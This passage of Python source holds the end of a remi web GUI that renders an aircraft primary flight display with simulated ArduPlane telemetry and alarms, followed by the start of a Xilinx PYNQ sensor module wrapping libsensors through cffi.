%s"%(-self.vw/2, -self.vh/2, self.vw, self.vh) self.group_pitch = gui.SvgGroup() self.group_pitch.css_transform = "rotate(0deg), translate(0, 0)" self.group_pitch.css_transform_box = "fill-box" self.group_pitch.css_transform_origin = "center" self.group_roll = gui.SvgGroup() self.group_roll.css_transform = "rotate(0deg), translate(0, 0)" self.group_roll.css_transform_box = "fill-box" self.group_roll.css_transform_origin = "50% 20%" self.group_roll.append(self.group_pitch) #horizon #background is static and occupy the entire attidute indicator self.horizon_background = gui.SvgRectangle(-self.vw/2, -self.vh/2, self.vw, self.vh) self.horizon_background.set_fill("rgb(0,100,255)") self.append(self.horizon_background) self.group_horizon_terrain = gui.SvgGroup() self.horizon_terrain = gui.SvgRectangle(-self.vw, 0, self.vw*2, self.vh*2) self.horizon_terrain.set_fill("rgb(53, 151, 0)") self.horizon_terrain.set_stroke(self.vh/1000.0, "lightgray") self.group_horizon_terrain.append(self.horizon_terrain) self.append(self.group_horizon_terrain) #pitch angle indication self.group_pitch_indicator = gui.SvgGroup() self.group_pitch.append(self.group_pitch_indicator) self.generate_pitch_indicator() self.append(self.group_roll) #roll angle indication min_radius = self.vw*0.45 mid_radius = self.vw*0.48 max_radius = self.vw*0.5 angle_min = -60 angle_max = 60 angle_step = 20 # was 5 for angle in range(angle_min, angle_max+angle_step, angle_step): r = min_radius if (angle%10)==0 else mid_radius x_min = math.cos(math.radians(angle+90))*r y_min = -math.sin(math.radians(angle+90))*r x_max = math.cos(math.radians(angle+90))*max_radius y_max = -math.sin(math.radians(angle+90))*max_radius hide_scale = abs(int(angle))>self.pitch_roll_scale_limit line = gui.SvgLine(x_min, y_min, x_max, y_max) line.set_stroke(self.vw*0.005, 'white' if not hide_scale else 'transparent') self.append(line) if (angle%10)==0: x_txt = math.cos(math.radians(angle+90))*(min_radius-0.025*self.vw) y_txt = -math.sin(math.radians(angle+90))*(min_radius-0.025*self.vw) txt = gui.SvgText(x_txt, y_txt, str(abs(int(angle)))) txt.attr_dominant_baseline = 'hanging' txt.attr_text_anchor = 'middle' txt.set_fill('white' if not hide_scale else 'transparent') txt.css_font_size = gui.to_pix(self.vw*0.04) txt.css_font_weight = 'bolder' self.append(txt) self.group_roll_indicator = gui.SvgGroup() self.group_roll_indicator.css_visibility = 'visible' self.append(self.group_roll_indicator) #roll and bank indicator self.group_roll_and_bank_angle_indicator = gui.SvgGroup() self.roll_indicator = gui.SvgPolygon(3) self.roll_indicator.set_fill('red') self.roll_indicator.set_stroke(1, 'black') self.roll_indicator.add_coord(-0.04*self.vw, -0.06*self.vw) self.roll_indicator.add_coord(0.0*self.vw, (-0.06 - 0.03)*self.vw) self.roll_indicator.add_coord(0.04*self.vw, -0.06*self.vw) self.group_roll_and_bank_angle_indicator.append(self.roll_indicator) self.bank_indicator = gui.SvgPolygon(4) self.bank_indicator.set_fill('transparent') self.bank_indicator.set_stroke(1, 'black') self.bank_indicator_width = 0.08 self.bank_indicator.add_coord(-(self.bank_indicator_width/2.0)*self.vw, (-0.06 + 0.005)*self.vw) self.bank_indicator.add_coord((self.bank_indicator_width/2.0)*self.vw, (-0.06 + 0.005)*self.vw) self.bank_indicator.add_coord((self.bank_indicator_width/2.0)*self.vw, (-0.06 + 0.025)*self.vw) self.bank_indicator.add_coord(-(self.bank_indicator_width/2.0)*self.vw, (-0.06 + 0.025)*self.vw) self.group_roll_and_bank_angle_indicator.append(self.bank_indicator) self.group_roll_and_bank_angle_indicator.attributes['transform'] = "translate(0 %s)"%(-0.3*self.vh) self.group_roll_indicator.append(self.group_roll_and_bank_angle_indicator) #airplaine indicator is steady thick = 0.02*self.vw self.airplane_svg_left = gui.SvgPolygon(8) self.airplane_svg_left.set_fill('gray') self.airplane_svg_left.set_stroke(0.005*self.vw, 'black') self.airplane_svg_left.add_coord(-0.2*self.vw, 0*self.vw) #25x8 self.airplane_svg_left.add_coord(-0.40*self.vw, 0*self.vw) self.airplane_svg_left.add_coord(-0.40*self.vw, thick) self.airplane_svg_left.add_coord(-0.2*self.vw - thick, thick) self.airplane_svg_left.add_coord(-0.2*self.vw - thick, thick + 0.08*self.vw) self.airplane_svg_left.add_coord(-0.2*self.vw, thick + 0.08*self.vw) self.airplane_svg_left.add_coord(-0.2*self.vw, 0.08*self.vw) self.airplane_svg_right = gui.SvgPolygon(8) self.airplane_svg_right.set_fill('gray') self.airplane_svg_right.set_stroke(0.005*self.vw, 'black') self.airplane_svg_right.add_coord(0.2*self.vw, 0*self.vw) #25x8 self.airplane_svg_right.add_coord(0.40*self.vw, 0*self.vw) self.airplane_svg_right.add_coord(0.40*self.vw, thick) self.airplane_svg_right.add_coord(0.2*self.vw + thick, thick) self.airplane_svg_right.add_coord(0.2*self.vw + thick, thick + 0.08*self.vw) self.airplane_svg_right.add_coord(0.2*self.vw, thick + 0.08*self.vw) self.airplane_svg_right.add_coord(0.2*self.vw, 0.08*self.vw) self.airplane_svg_center = gui.SvgRectangle(-0.02*self.vw, -0.02*self.vw, 0.04*self.vw, 0.04*self.vw) self.airplane_svg_center.set_fill('white') self.airplane_svg_center.set_stroke(0.005*self.vw, 'lightgray') self.append([self.airplane_svg_left, self.airplane_svg_right, self.airplane_svg_center]) #self.generate_orientation_indicator() self.orientation_tape = OrientationTapeHorizontal(0, 0.4*self.vh, 0.8*self.vw, 1.0*self.vh) self.append(self.orientation_tape) self.set_skid_slip(0) def generate_pitch_indicator(self): self.group_pitch_indicator.empty() s1 = 0.05*self.vw #min_sign_width s2 = 0.1*self.vw #mid_sign_width s3 = 0.20*self.vw #max_sign_width index = 0 radius = 1.0*self.vw step = 5 # was 2.5 angle_min = -90 angle_max = 90 sign_sizes = [s3, s2] # was sign_sizes = [s3, s1, s2, s1] content = "" for angle in range(int(angle_min*10), int(angle_max*10), int(step*10)): sign_size = sign_sizes[index%len(sign_sizes)] index += 1 angle = angle/10.0 #angle = math.degrees(math.acos(math.cos(math.radians(angle)))) hide_scale = abs(angle) > self.pitch_roll_scale_limit if angle == 0: sign_size = 0 y = -math.sin(math.radians(90.0))/90.0*(angle)*radius """ line = gui.SvgLine(-sign_size/2, y, sign_size/2, y) line.set_stroke(0.01*self.vw, 'rgba(255,255,255,0.5)' if not hide_scale else 'transparent') self.group_pitch_indicator.append(line) """ content += """<line class="SvgLine" x1="%(x1)s" y1="%(y1)s" x2="%(x2)s" y2="%(y2)s" stroke="rgba(255,255,255,0.5)" stroke-width="1.0"></line>"""%{'x1':-sign_size/2, 'y1':y, 'x2':sign_size/2, 'y2':y} #if it is a big sign, add also text if sign_size == s3: content += """<text class="SvgText" x="%(x)s" y="%(y)s" fill="rgba(255,255,255,0.5)" style="dominant-baseline:middle;text-anchor:start;font-size:4.0px">%(text)s</text>"""%{'x':sign_size/2, 'y':y, 'text':str(int(angle))} content += """<text class="SvgText" x="%(x)s" y="%(y)s" fill="rgba(255,255,255,0.5)" style="dominant-baseline:middle;text-anchor:end;font-size:4.0px">%(text)s</text>"""%{'x':-sign_size/2, 'y':y, 'text':str(int(angle))} """ txt = gui.SvgText(sign_size/2, y, str(int(angle))) txt.attr_dominant_baseline = 'middle' txt.attr_text_anchor = 'start' txt.set_fill('rgba(255,255,255,0.5)' if not hide_scale else 'transparent') txt.css_font_size = gui.to_pix(0.04*self.vw) self.group_pitch_indicator.append(txt) txt = gui.SvgText(-sign_size/2, y, str(int(angle))) txt.attr_dominant_baseline = 'middle' txt.attr_text_anchor = 'end' txt.set_fill('rgba(255,255,255,0.5)' if not hide_scale else 'transparent') txt.css_font_size = gui.to_pix(0.04*self.vw) self.group_pitch_indicator.append(txt) """ self.group_pitch_indicator.add_child('content', content) def set_pitch(self, pitch): self.pitch = pitch def set_orientation(self, orientation): self.orientation = orientation def set_roll(self, roll): self.roll = roll def set_skid_slip(self, value): self.bank_indicator.attributes['transform'] = "translate(%s 0)"%(self.bank_indicator_width*(value/100.0)*self.vw) def update_attitude(self): if self.group_roll_indicator.css_visibility == 'visible' and abs(self.roll) > 90: self.group_roll_indicator.css_visibility = 'hidden' if self.group_roll_indicator.css_visibility == 'hidden' and abs(self.roll) <= 90: self.group_roll_indicator.css_visibility = 'visible' #self.generate_orientation_indicator() #self.orientation_subcontainer.set_viewbox(-90 + self.orientation, 0, 180, 1*self.vh) self.orientation_tape.set_orientation(self.orientation) #self.group_pitch.attributes['transform'] = "rotate(%s 0 0) translate(0 %s)"%(self.orientation, math.sin(math.radians(self.pitch))) self.group_roll.attributes['transform'] = "rotate(%s 0 0)"%(-self.roll) self.group_roll_indicator.attributes['transform'] = "rotate(%s 0 0)"%(-self.roll) self.group_roll_indicator.css_transform_origin = "0% 0%" offset = (math.sin(math.radians(90.0))/90.0*self.pitch*self.vw) self.group_pitch.attributes['transform'] = "translate(0 %s)"%offset self.group_horizon_terrain.attributes['transform'] = "rotate(%s 0 0) translate(0 %s)"%(-self.roll, (offset*0.4)) self.group_roll.css_transform_origin = "50%% %.2fpx"%(-offset+0.97*self.vw) #self.group_orientation_indicator.attributes['transform'] = "rotate(%s 0 0)"%(-self.orientation) class PrimaryFlightDisplay(gui.Svg): def __init__(self, *args, **kwargs): gui.Svg.__init__(self, *args, **kwargs) self.attr_viewBox = "-72 -50 144 100" background = gui.SvgRectangle(-100, -50, 200, 100) background.set_fill('black') self.append(background) self.attitude_indicator = AttitudeIndicator() self.append(self.attitude_indicator) self.speed_indicator = TapeVertical(-51, 0, 20, 80, True, 999, 100, 12, 40, 25, 68) #three digits values self.append(self.speed_indicator) self.altitude_indicator = TapeVertical(51, 0, 20, 80, False, 9999, 100) #four digits values self.append(self.altitude_indicator) #x_pos, y_pos, wide, high, left_side, scale_length, scale_length_visible self.VSI_indicator = SimpleVSI(85, 0, 10, 50) self.append(self.VSI_indicator) def set_attitude_pitch(self, value): self.attitude_indicator.set_pitch(value) def set_attitude_orientation(self, value): self.attitude_indicator.set_orientation(value) def set_attitude_roll(self, value): self.attitude_indicator.set_roll(value) def set_skid_slip(self, value): self.attitude_indicator.set_skid_slip(value) def set_altitude(self, value): self.altitude_indicator.set_value(value) def set_speed(self, value): self.speed_indicator.set_value(value) def set_VSI(self, value): self.VSI_indicator.set_value(value) def update_attitude(self): self.attitude_indicator.update_attitude() class Application(App): color_flipper = None standard_label_color = 'white' thread_alive_flag = False INOP_condition = False INOP_sim = False INOP_telemetry_seen = False INOP_alarm_time = time.time() # the time of alarm start INOP_alarm_limit = 30 # stop blinking after this many seconds INOP_last_telemetry = time.time() - 10 ab = 0.1 voltage_alarm = False rpm = 0 rpm_alarm = False rpm_alarm_time = time.time() # the time of alarm start rpm_alarm_limit = 30 # stop blinking after this many seconds rpm_active = False fix_alarm = False vibration_alarm = False mode_alarm = False mode_change_time = time.time() text_severity = 6 # 6=low severity 0=highest text_alarm_sec = 2 # how long to flash text_alarm_time = time.time() # time when alarm started def idle(self): #idle function called every update cycle # Voltage alarm if self.voltage_alarm: self.t5.css_color = self.color_flipper[0] self.t5.css_background_color = 'red' else: self.t5.css_color = self.standard_label_color del self.t5.css_background_color # RPM alarm if self.rpm_active and self.rpm < 500: # low RPM / not running self.rpm_alarm = True self.rpm_alarm_time = time.time() self.rpm_active = False if not self.rpm_active and self.rpm > 500: self.rpm_active = True self.rpm_alarm = False if self.rpm_alarm and time.time() - self.rpm_alarm_time > self.rpm_alarm_limit: self.rpm_active = False self.rpm_alarm = False if self.rpm_alarm: self.t6.css_color = self.color_flipper[0] self.t6.css_background_color = 'red' else: self.t6.css_color = self.standard_label_color del self.t6.css_background_color # GNSS Fix alarm if self.fix_alarm: self.s.css_color = self.color_flipper[0] self.s.css_background_color = 'red' else: self.s.css_color = self.standard_label_color del self.s.css_background_color # Mode change awareness if time.time() - self.mode_change_time < 2: self.m.css_color = self.color_flipper[0] self.m.css_background_color = 'green' else: self.m.css_color = self.standard_label_color del self.m.css_background_color # Vibration alarm if self.vibration_alarm: self.left3.css_color = self.color_flipper[0] self.left3.css_background_color = 'red' else: self.left3.css_color = self.standard_label_color del self.left3.css_background_color # Display using text severity if self.text_severity < 6 and time.time() - self.text_alarm_time > self.text_alarm_sec: self.t1.css_background_color = 'green' if self.text_severity < 4: self.t1.css_color = self.color_flipper[0] self.t1.css_background_color = 'red' else: self.t1.css_color = self.standard_label_color del self.t1.css_background_color # Notify of telemetry loss if time.time() - self.INOP_last_telemetry < 2: self.INOP_condition = False self.INOP_telemetry_seen = True else: if self.INOP_telemetry_seen: self.INOP_condition = True if self.INOP_condition and time.time() - self.INOP_last_telemetry > self.INOP_alarm_limit: self.INOP_condition = False self.INOP_telemetry_seen = False if self.INOP_condition or self.INOP_sim: self.centering_container.css_background_color = {'red': 'black', 'black': 'red'}[ self.centering_container.css_background_color] else: self.centering_container.css_background_color = 'black' #swap colors each update self.color_flipper = [self.color_flipper[1],self.color_flipper[0]] def main(self): self.color_flipper = ['orange', 'white'] self.centering_container = gui.Container(width=640, height=360, style={'background-color':'black', "position":"absolute"}) #to make a left margin or 50px (because of google glasses curvature), I have to calculate a new height _w_margin = 40 _h_margin = 0 # was _w_margin*360/640 self.main_container = AsciiContainer(width=640-_w_margin, height=360-_h_margin, style={'background-color':'transparent', 'position':'relative', 'margin-left':gui.to_pix(_w_margin), 'margin-top':gui.to_pix(_h_margin/2)}) self.main_container.set_from_asciiart(""" | t0 | | left1 | pfd | | left1 | pfd | | left1 | pfd | | left2 | pfd | | left2 | pfd | | left2 | pfd | | left3 | pfd | | left3 | pfd | | left3 | pfd | | left4 | pfd | | left4 | pfd | | left4 | pfd | | s | m | t5 | t6 | | t1 | """, gap_horizontal=0, gap_vertical=0) w = "95%" h = 30 self.slider_pitch = gui.SpinBox(0, -90.0, 90.0, 2.0, width=w, height=h) self.slider_orientation = gui.SpinBox(0, -180, 180, 2, width=w, height=h) self.slider_roll = gui.SpinBox(0, -180, 180, 2.0, width=w, height=h) self.slider_altitude = gui.SpinBox(0, 0, 9999, 1.0, width=w, height=h) self.slider_speed = gui.SpinBox(0, 0, 999, 1.0, width=w, height=h) """ controls_container = gui.VBox() controls_container.append( gui.VBox(children=[gui.Label('pitch'), self.slider_pitch], width=300) ) controls_container.append( gui.VBox(children=[gui.Label('orientation'), self.slider_orientation], width=300) ) controls_container.append( gui.VBox(children=[gui.Label('roll'), self.slider_roll], width=300) ) controls_container.append( gui.VBox(children=[gui.Label('altitude'), self.slider_altitude], width=300) ) controls_container.append( gui.VBox(children=[gui.Label('speed'), self.slider_speed], width=300) ) hbox0.append(controls_container) """ h_divisions = 14.0 self.pfd = PrimaryFlightDisplay(style={'position':'relative'}) _style = {'text-align':'center', 'color':self.standard_label_color, 'outline':'1px solid black', 'font-size':'16px'} self.t0 = gui.Label("T0", style=_style) self.t1 = gui.Label("WAITING FOR MAVLINK", style=_style) self.t5 = gui.Label("Voltage", style=_style) self.t6 = gui.Label("RPM", style=_style) self.s = gui.Label("GNSS", style=_style) self.m = gui.Label("MODE", style=_style) self.left1 = gui.Label("", style=_style) self.left2 = gui.Label("", style=_style) self.left3 = gui.Label("", style=_style) self.left4 = gui.Label("", style=_style) self.main_container.append(self.pfd, "pfd") self.main_container.append(self.t0, "t0") self.main_container.append(self.t1, "t1") self.main_container.append(self.t5, "t5") self.main_container.append(self.t6, "t6") self.main_container.append(self.s, "s") self.main_container.append(self.m, "m") self.main_container.append(self.left1, "left1") self.main_container.append(self.left2, "left2") self.main_container.append(self.left3, "left3") self.main_container.append(self.left4, "left4") # Here I start a parallel thread self.thread_alive_flag = True t = threading.Thread(target=self.my_threaded_function) t.start() self.centering_container.append(self.main_container) return self.centering_container def my_threaded_function(self): testmsg = [[6, "Mission: 1 WP"], [4, "Throttle failsafe on"], [4, "Failsafe. Short event on: type=1/reason=3"], [4, "Failsafe. Long event on: type=2/reason=3"], [1, "123456789012345678901234567890123456789012345678901234567890ABCDEFGH"], [4, "Failsafe. Long event off: reason=3"], [6, "ArduPlane V4.0.6 (036ad450)"], [6, "ChibiOS: d4fce84e"], [6, "CubeBlack 003D0043 32385108 32373737"], [6, "Throttle disarmed"], [6, "RCOut: PWM:1-12"], [6, "Ground start"], [1, "Beginning INS calibration. Do not move plane"], [6, "Calibrating barometer"], [6, "Barometer 1 calibration complete"], [6, "Barometer 2 calibration complete"], [6, "Airspeed calibration started"], [6, "Ground start complete"], [2, "PreArm: radio Failsafe On"], [4, "Throttle failsafe off"], [6, "GPS 1: detected as u-blox at 115200 baud"], [6, "EKF2 IMU0 initial yaw alignment complete"], [6, "EKF2 IMU1 initial yaw alignment complete"], [6, "Airspeed 1 calibrated"], [6, "EKF2 IMU1 tilt alignment complete"], [6, "EKF2 IMU0 tilt alignment complete"], [6, "EKF2 IMU0 origin set"], [6, "EKF2 IMU1 origin set"], [6, "GPS: u-blox 1 saving config"], [6, "u-blox 1 HW: 00080000 SW: EXT CORE 3.01 (d080e3)"], [6, "EKF2 IMU0 is using GPS"], [6, "EKF2 IMU1 is using GPS"], [6, "Throttle armed"], [6, "Flight plan received"], [2, "EKF Variance"], [4, "GPS Glitch"], [4, "GPS Glitch cleared"], [6, "Mission: 1 WP"], [6, "EKF2 IMU0 switching to compass 1"], [6, "EKF2 IMU1 switching to compass 1"], [6, "Reached waypoint #1 dist 29m"], [6, "Mission: 2 WP"], [6, "Reached waypoint #2 dist 30m"], [6, "Mission: 3 WP"]] mode_array_test = ["MANUAL", "CIRCLE", "STABILIZE", "TRAINING", "ACRO", "FLY_BY_WIRE_A", "FLY_BY_WIRE_B", "CRUISE", "AUTOTUNE", "AUTO", "RTL", "LOITER", "TAKEOFF", "AVOID_ADSB", "GUIDED", "INITIALISING", "QSTABILIZE", "QHOVER", "QLOITER", "QLAND", "QRTL", "QAUTOTUNE", "QACRO"] incrementa_number_for_testing = 0 t1_text = "" t1_ptr = 0 m_ptr = 0 yaw = 0 m = 0 mode_last = -1 time_for_text = time.time() time_for_mode = time.time() while self.thread_alive_flag: #calculations yaw = yaw - 3 if yaw < 0: yaw = 360 self.ab +=0.5 if self.ab > 70: self.ab=-70 # text simulation # horizontal space for max 68 chars with 16 px font if time.time() - time_for_text > 3: # time to change text time_for_text = time.time() # fetch new message t1_text = testmsg[t1_ptr][1] self.text_severity = testmsg[t1_ptr][0] t1_ptr += 1 if t1_ptr == len(testmsg): t1_ptr = 0 # mode simulation if time.time() - time_for_mode > 10: # time to change text time_for_mode = time.time() # fetch new message m = mode_array_test[m_ptr] if mode_last != m_ptr: mode_last = m_ptr self.mode_change_time = time.time() m_ptr += 1 if m_ptr == len(mode_array_test): m_ptr = 0 pitch=self.ab roll=self.ab alt=abs(self.ab*1.5+400) speed=abs(self.ab) # trigger some test alarms if alt > 290 and alt < 310: self.voltage_alarm = True else: self.voltage_alarm = False if alt > 320 and alt < 340: self.mode_alarm = True else: self.mode_alarm = False if alt > 360 and alt < 380: self.rpm_alarm = True self.INOP_sim = True else: self.rpm_alarm = False self.INOP_sim = False if alt > 400 and alt < 420: self.fix_alarm = True else: self.fix_alarm = False if alt > 440 and alt < 460: self.vibration_alarm = True else: self.vibration_alarm = False """ WIDGETS MUST BE UPDATED in UPDATE_LOCK CONTEXT to prevent concurrent thread access on gui elements """ with self.update_lock: self.pfd.set_attitude_pitch(float(pitch)) self.pfd.set_attitude_orientation(float(yaw)) self.pfd.set_attitude_roll(float(roll)) self.pfd.set_altitude(float(alt)) self.pfd.set_speed(float(speed)) self.pfd.set_VSI((speed / 3.3) - 10) self.pfd.update_attitude() self.s.set_text("Sat:19 T:3") self.m.set_text(str(mode_array_test[m_ptr])) self.t1.set_text(t1_text) self.left1.set_text("GS: 29.2") self.left2.set_text("wind\ndir: 154\nspd: 5.2") self.left3.set_text("Vibrations:\nx:6 y:10 z:12") self.left4.set_text("\nThr: 32 %") self.t5.set_text("Batt: 23.2V") self.t6.set_text("5476 RPM") incrementa_number_for_testing += 1 time.sleep(0.18) def on_close(self): """ When app closes, the thread gets stopped """ self.thread_alive_flag = False super(MyApp, self).on_close() def onload(self, emitter): """ WebPage Event that occurs on webpage loaded """ self.execute_javascript("""if (screen.width == 427 && screen.height == 240) {document.body.style.zoom="68%";}""") if __name__ == "__main__": start(Application, address='0.0.0.0', port=8080, multiple_instance=False, start_browser=True, debug=False, update_interval=0.2)
pmbus.py
# Copyright (c) 2016, Xilinx, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import cffi import glob import os import threading import time import warnings __author__ = "Peter Ogden" __copyright__ = "Copyright 2018, Xilinx" __email__ = "pynq_support@xilinx.com" _c_header = R""" extern const char *libsensors_version; typedef struct sensors_bus_id { short type; short nr; } sensors_bus_id; typedef struct sensors_chip_name { char *prefix; sensors_bus_id bus; int addr; char *path; } sensors_chip_name; int sensors_init(FILE *input); void sensors_cleanup(void); int sensors_parse_chip_name(const char *orig_name, sensors_chip_name *res); void sensors_free_chip_name(sensors_chip_name *chip); int sensors_snprintf_chip_name(char *str, size_t size, const sensors_chip_name *chip); const char *sensors_get_adapter_name(const sensors_bus_id *bus); typedef struct sensors_feature sensors_feature; char *sensors_get_label(const sensors_chip_name *name, const sensors_feature *feature); int sensors_get_value(const sensors_chip_name *name, int subfeat_nr, double *value); int sensors_set_value(const sensors_chip_name *name, int subfeat_nr, double value); int sensors_do_chip_sets(const sensors_chip_name *name); const sensors_chip_name *sensors_get_detected_chips(const sensors_chip_name *match, int *nr); typedef enum sensors_feature_type { SENSORS_FEATURE_IN = 0x00, SENSORS_FEATURE_FAN = 0x01, SENSORS_FEATURE_TEMP = 0x02, SENSORS_FEATURE_POWER = 0x03, SENSORS_FEATURE_ENERGY = 0x04, SENSORS_FEATURE_CURR = 0x05, SENSORS_FEATURE_HUMIDITY = 0x06, SENSORS_FEATURE_MAX_MAIN, SENSORS_FEATURE_VID = 0x10, SENSORS_FEATURE_INTRUSION = 0x11, SENSORS_FEATURE_MAX_OTHER, SENSORS_FEATURE_BEEP_ENABLE = 0x18, SENSORS_FEATURE_MAX, SENSORS_FEATURE_UNKNOWN = 0x7fffffff, } sensors_feature_type; typedef enum sensors_subfeature_type { SENSORS_SUBFEATURE_IN_INPUT = 0, SENSORS_SUBFEATURE_IN_MIN, SENSORS_SUBFEATURE_IN_MAX, SENSORS_SUBFEATURE_IN_LCRIT, SENSORS_SUBFEATURE_IN_CRIT, SENSORS_SUBFEATURE_IN_AVERAGE, SENSORS_SUBFEATURE_IN_LOWEST, SENSORS_SUBFEATURE_IN_HIGHEST, SENSORS_SUBFEATURE_IN_ALARM = 0x80, SENSORS_SUBFEATURE_IN_MIN_ALARM, SENSORS_SUBFEATURE_IN_MAX_ALARM, SENSORS_SUBFEATURE_IN_BEEP, SENSORS_SUBFEATURE_IN_LCRIT_ALARM, SENSORS_SUBFEATURE_IN_CRIT_ALARM, SENSORS_SUBFEATURE_FAN_INPUT = 0x100, SENSORS_SUBFEATURE_FAN_MIN, SENSORS_SUBFEATURE_FAN_MAX, SENSORS_SUBFEATURE_FAN_ALARM = 0x180, SENSORS_SUBFEATURE_FAN_FAULT, SENSORS_SUBFEATURE_FAN_DIV, SENSORS_SUBFEATURE_FAN_BEEP, SENSORS_SUBFEATURE_FAN_PULSES, SENSORS_SUBFEATURE_FAN_MIN_ALARM, SENSORS_SUBFEATURE_FAN_MAX_ALARM, SENSORS_SUBFEATURE_TEMP_INPUT = 0x200, SENSORS_SUBFEATURE_TEMP_MAX, SENSORS_SUBFEATURE_TEMP_MAX_HYST, SENSORS_SUBFEATURE_TEMP_MIN, SENSORS_SUBFEATURE_TEMP_CRIT, SENSORS_SUBFEATURE_TEMP_CRIT_HYST, SENSORS_SUBFEATURE_TEMP_LCRIT, SENSORS_SUBFEATURE_TEMP_EMERGENCY, SENSORS_SUBFEATURE_TEMP_EMERGENCY_HYST, SENSORS_SUBFEATURE_TEMP_LOWEST, SENSORS_SUBFEATURE_TEMP_HIGHEST, SENSORS_SUBFEATURE_TEMP_MIN_HYST, SENSORS_SUBFEATURE_TEMP_LCRIT_HYST, SENSORS_SUBFEATURE_TEMP_ALARM = 0x280, SENSORS_SUBFEATURE_TEMP_MAX_ALARM, SENSORS_SUBFEATURE_TEMP_MIN_ALARM, SENSORS_SUBFEATURE_TEMP_CRIT_ALARM, SENSORS_SUBFEATURE_TEMP_FAULT, SENSORS_SUBFEATURE_TEMP_TYPE, SENSORS_SUBFEATURE_TEMP_OFFSET, SENSORS_SUBFEATURE_TEMP_BEEP, SENSORS_SUBFEATURE_TEMP_EMERGENCY_ALARM, SENSORS_SUBFEATURE_TEMP_LCRIT_ALARM, SENSORS_SUBFEATURE_POWER_AVERAGE = 0x300, SENSORS_SUBFEATURE_POWER_AVERAGE_HIGHEST, SENSORS_SUBFEATURE_POWER_AVERAGE_LOWEST, SENSORS_SUBFEATURE_POWER_INPUT, SENSORS_SUBFEATURE_POWER_INPUT_HIGHEST, SENSORS_SUBFEATURE_POWER_INPUT_LOWEST, SENSORS_SUBFEATURE_POWER_CAP, SENSORS_SUBFEATURE_POWER_CAP_HYST, SENSORS_SUBFEATURE_POWER_MAX, SENSORS_SUBFEATURE_POWER_CRIT, SENSORS_SUBFEATURE_POWER_AVERAGE_INTERVAL = 0x380, SENSORS_SUBFEATURE_POWER_ALARM, SENSORS_SUBFEATURE_POWER_CAP_ALARM, SENSORS_SUBFEATURE_POWER_MAX_ALARM, SENSORS_SUBFEATURE_POWER_CRIT_ALARM, SENSORS_SUBFEATURE_ENERGY_INPUT = 0x400, SENSORS_SUBFEATURE_CURR_INPUT = 0x500, SENSORS_SUBFEATURE_CURR_MIN, SENSORS_SUBFEATURE_CURR_MAX, SENSORS_SUBFEATURE_CURR_LCRIT, SENSORS_SUBFEATURE_CURR_CRIT, SENSORS_SUBFEATURE_CURR_AVERAGE, SENSORS_SUBFEATURE_CURR_LOWEST, SENSORS_SUBFEATURE_CURR_HIGHEST, SENSORS_SUBFEATURE_CURR_ALARM = 0x580, SENSORS_SUBFEATURE_CURR_MIN_ALARM, SENSORS_SUBFEATURE_CURR_MAX_ALARM, SENSORS_SUBFEATURE_CURR_BEEP, SENSORS_SUBFEATURE_CURR_LCRIT_ALARM, SENSORS_SUBFEATURE_CURR_CRIT_ALARM, SENSORS_SUBFEATURE_HUMIDITY_INPUT = 0x600, SENSORS_SUBFEATURE_VID = 0x1000, SENSORS_SUBFEATURE_INTRUSION_ALARM = 0x1100, SENSORS_SUBFEATURE_INTRUSION_BEEP, SENSORS_SUBFEATURE_BEEP_ENABLE = 0x1800, SENSORS_SUBFEATURE_UNKNOWN = 0x7fffffff, } sensors_subfeature_type; struct sensors_feature { char *name; int number; sensors_feature_type type; int first_subfeature; int padding1; }; typedef struct sensors_subfeature { char *name; int number; sensors_subfeature_type type; int mapping; unsigned int flags; } sensors_subfeature; const sensors_feature * sensors_get_features(const sensors_chip_name *name, int *nr); const sensors_subfeature * sensors_get_all_subfeatures(const sensors_chip_name *name, const sensors_feature *feature, int *nr); const sensors_subfeature * sensors_get_subfeature(const sensors_chip_name *name, const sensors_feature *feature, sensors_subfeature_type type); """ _ffi = cffi.FFI() try: _ffi.cdef(_c_header) _lib = _ffi.dlopen("libsensors.so.4") except Exception as e: _lib = None class SysFSSensor: def __init__(self, path, unit, name, scale): self._path = path self._unit = unit self.name = name self._scale = scale self.parents = tuple() @property def value(self): with open(self._path, "r") as f: raw_value = float(f.read()) return raw_value * self._scale def get_value(self, parents=None): return self.value def __repr__(self): return "Sensor {{name={}, value={}{}}}".format( self.name, self.value, self._unit) class DerivedPowerSensor: def __init__(self, name, voltage, current): parents = (voltage, current) self.voltage_sensor = voltage self.current_sensor = current self.name = name self.parents = (voltage, current) def get_value(self, parents=None): if parents is None: return self.voltage_sensor.value * self.current_sensor.value else: return parents[0] * parents[1] @property def value(self): return self.get_value() def __repr__(self): return "Sensor {{name={}, value={}W}}".format( self.name, self.value) class Sensor: """Interacts with a sensor exposed by libsensors The value of the sensor is determined by the unit of the underlying sensor API - that is generally Volts for potential difference, Amperes for current, Watts for power and degrees Centigrade for temperature Attributes ---------- name : str The name of the sensor value : float The current value of the sensor """ def __init__(self, chip, number, unit, name): """Create a new sensor object wrapping a libsensors chip and feature Parameters ---------- chip : FFI sensors_chip_name* The chip the sensor is on number : int The number of sensor on the chip unit : str Unit to append to the value when creating a string representation name : str Name of the sensor """ self._chip = chip self._number = number self._value = _ffi.new("double [1]") self._unit = unit self.name = name 